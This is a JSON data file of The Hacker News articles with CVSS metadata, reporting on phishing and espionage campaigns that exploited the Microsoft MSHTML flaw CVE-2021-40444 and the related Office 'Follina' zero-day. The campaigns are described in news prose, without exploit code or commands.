{"thn": [{"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-3vEprTVA4BI/YULvTEzYNCI/AAAAAAAADz0/RpSk1fU9GbcY7e98Gg2r8aBRvy73Z52kACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nMicrosoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.\n\n\"These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders,\" Microsoft Threat Intelligence Center [said](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in a technical write-up. \"These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\"\n\nDetails about CVE-2021-40444 (CVSS score: 8.8) first [emerged](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) on September 7 after researchers from EXPMON alerted the Windows maker about a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users by taking advantage of a remote code execution vulnerability in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document,\" the researchers noted. Microsoft has since [rolled out a fix](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) for the vulnerability as part of its Patch Tuesday updates a week later on September 14.\n\nThe Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.\n\nThe exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. The DLL, in turn, retrieves remotely hosted shellcode \u2014 a custom Cobalt Strike Beacon loader \u2014 and loads it into the Microsoft address import tool.\n\nAdditionally, Microsoft said some of the infrastructures that were used by DEV-0413 to host the malicious artifacts were also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and by Mandiant as UNC1878).\n\n\"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack,\" the researchers said. \"It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\"\n\nIn an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.\n\n\"The association of a zero-day exploit with a ransomware group, however remote, is troubling,\" RiskIQ researchers [said](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>). It suggests either that turnkey tools like zero-day exploits have found their way into the already robust ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T07:19:00", "type": "thn", "title": "Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-12T15:17:20", "id": "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "href": "https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T17:38:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgi3RXvGtPoTC8ufDqadLbye4bhkJjWs-Un41xcwOWrqQPpLekG-pG0Xxk-or-GInK-LQOG7QDpCF3p4FVNPMxdNLSsl4TgenAVq4LOJcfYcZ0LcgQ0zlwru8TY2ff5ffd7EEPtwFERwA4hDGj0uKeJYZBw1AGUroAFwL-QXSJrDONv8gHe7E2ghPpr/s728-e100/hacking-code.jpg>)\n\nCybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.\n\nThe vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (\"[05-2022-0438.doc](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection>)\") that was uploaded to VirusTotal from an IP address in Belarus.\n\n\"It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code,\" the researchers [noted](<https://twitter.com/nao_sec/status/1530196847679401984>) in a series of tweets last week.\n\nAccording to security researcher Kevin Beaumont, who dubbed the flaw \"Follina,\" the maldoc leverages Word's [remote template](<https://attack.mitre.org/techniques/T1221/>) feature to fetch an HTML file from a server, which then makes use of the \"ms-msdt://\" URI scheme to run the malicious payload.\n\nThe shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.\n\n[MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.\n\n\"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled,\" Beaumont [explained](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>).\n\n\"[Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View,\" the researcher added.\n\nIn a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file (\"RDF842l.html\") that triggers the exploit originated from a now-unreachable domain named \"xmlformats[.]com.\"\n\n\"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer,\" Huntress Labs' John Hammond [said](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>). \"Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger.\"\n\nMultiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.\n\nWhat's more, Richard Warren of NCC Group [managed](<https://twitter.com/buffaloverflow/status/1530866518279565312>) to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.\n\n\"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking,\" Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T09:40:00", "type": "thn", "title": "Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-30T15:44:33", "id": "THN:E7762183A6F7B3DDB942D3F1F99748F6", "href": "https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjYUPLUjcZm_IOi_2W8OCO67vRS3dKYHbn9uyV27yUDW18dhUv8jXFX9JDvQYw6FCzwj__3eQkTEwAOG-s6nigko_jBV77WQl46SxYEsGMQxc5g2hIFfR11hGm-vi1oobscaw6jTNgq2ed6ZN5OE9wz9JHWzNk0PH1xq9WzsWMs18Gk_P_yhPWT0YQm>)\n\nA new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv>)\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering sensitive information and transmitting them to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021. \n\nThe development is the latest in a string of attacks that have capitalized on the MSTHML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8>)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. \"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": "THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. \"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. \"Next OneDrive would sync with the victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSTHML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-02T06:04:33", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgRdLCnYaPXc_hVvRWhZ1nKYDtBRo6rwk1xGSO3wDrqcJ04igkpjKQyuyHKgmgeHL6GS7XLJjB6WCffBWb-ntXiCGFrcggxS3t1sQxo2LiuX7WI9F-gwW3tPRARSzEWceyzsLgu1VSyZndaF36ZhDlzpBRvkHLp7Ao_zaUYJmthkY4IZN4znwcyRdpY/s728-e100/hacking.jpg>)\n\nThe Russian state-sponsored threat actor known as [APT28](<https://thehackernews.com/2022/09/researchers-identify-3-hacktivist.html>) has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.\n\nThe technique \"is designed to be triggered when the user starts the presentation mode and moves the mouse,\" cybersecurity firm Cluster25 [said](<https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/>) in a technical report. \"The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.\"\n\nThe dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads.\n\nThe attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ([OECD](<https://en.wikipedia.org/wiki/OECD>)), a Paris-based intergovernmental entity.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjM4urmpBb2OaNLBBurEzXMWD5Gc0bF0d-1A8k55IscX0Hlkq-v1VQ39Xj9y7iwnPFlRBxvY1w6ZlUWb5dYTHpIwA3gVd7mcXXY64dImoNQO7bXe84Wez6JCWTlrdS77BnSIF6DllbmNoGykj67hPrGivBZDqdvzOgXckRo6adoi5bgIMpmnmWEI4_Y/s728-e100/ppt.jpg>)\n\nCluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.\n\nPotential targets of the operation likely include entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.\n\nThis is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix [disclosed](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>) a similar attack chain that exploited the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) to drop the backdoor.\n\nThe development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-28T10:09:00", "type": "thn", "title": "Hackers Using PowerPoint Mouseover Trick to Infect Systems with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", 